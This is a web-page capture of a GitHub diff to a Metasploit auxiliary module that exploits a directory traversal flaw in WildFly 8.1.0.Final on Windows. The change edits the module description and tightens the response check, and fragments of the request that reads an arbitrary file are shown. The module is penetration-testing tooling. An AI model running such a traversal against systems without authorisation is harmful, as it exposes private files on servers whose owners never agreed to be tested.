File tree Expand file tree Collapse file tree 1 file changed +8
-4
lines changed
modules/auxiliary/scanner/http Expand file tree Collapse file tree 1 file changed +8
-4
lines changed Original file line number Diff line number Diff line change @@ -13,10 +13,11 @@ class Metasploit3 < Msf::Auxiliary
13
13
14
14
def initialize ( info = { } )
15
15
super ( update_info ( info ,
16
- 'Name' => 'WildFly 8 (JBossAS) Directory Traversal' ,
16
+ 'Name' => 'WildFly 8 Directory Traversal' ,
17
17
'Description' => %q{
18
- This module exploits a directory traversal vulnerability found in WildFly
19
- 8.1.0.Final webserver on port 8080.
18
+ This module exploits a directory traversal vulnerability found in the WildFly 8.1.0.Final
19
+ web server running on port 8080, named JBoss Undertow. The vulnerability only affects to
20
+ Windows systems.
20
21
} ,
21
22
'References' =>
22
23
[
@@ -47,7 +48,10 @@ def run_host(ip)
47
48
'uri' => "/#{ traversal } \\ #{ datastore [ 'RELATIVE_FILE_PATH' ] } "
48
49
} )
49
50
50
- if res && res . code == 200
51
+ if res &&
52
+ res . code == 200 &&
53
+ res . headers [ 'Server' ] &&
54
+ res . headers [ 'Server' ] =~ /WildFly/
51
55
vprint_line ( res . to_s )
52
56
fname = File . basename ( datastore [ 'RELATIVE_FILE_PATH' ] )
53
57
You can’t perform that action at this time.
0 commit comments